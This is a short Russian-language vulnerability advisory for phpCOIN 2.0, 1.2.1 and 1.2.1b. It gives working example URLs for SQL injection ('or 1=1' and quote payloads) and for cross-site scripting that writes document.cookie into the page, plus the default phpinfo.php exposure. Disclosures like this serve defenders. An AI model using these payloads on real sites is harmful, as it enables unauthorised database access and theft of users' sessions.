Программа: phpCOIN 2.0, 1.2.1, 1.2.1b 

Уязвимость позволяет удаленному пользователю произвести XSS атаку и выполнить произвольные SQL команды в целевой базе данных.
SQL-инъекция существует из-за некорректной обработки входных данных в некоторых сценариях. Удаленный пользователь может выполнить произвольные SQL команды на сервере. 

Примеры:

http://[target]phpcoin/mod.php?mod=siteinfo&id=1′
http://[target]phpcoin/mod.php?mod=faq&mode= show&faq_id=2%20or%201=1
http://[target]phpc oin/mod.php?mod=pages&mode= view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id= 4%20or%201=1

Межсайтовый скриптинг возможен из-за некорректной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы. 

Примеры:

http://[target]phpcoin/mod.php?mod=helpdesk&mode=
new%22%3E%3Cscript%3Edocument.write(document.cooki e)%3C/script%3E 

http://[target]phpcoin/mod.php?mod=mail&mode=reset &w=user%22%3E%3Cscript%3Edocument.write(document.cookie)
%3C/script%3E

http://[target]phpcoin/log in.php?w=user&o=login&e=
u%22%3E%3Cscript%3Edocument.write(document.cookie) %3C/script%3E

В конфигурации по умолчанию злоумышленник может получить доступ к системной информации на сервере. 

Пример:

http://[target]/phpcoin_directory/phpinfo.php

Оставить мнение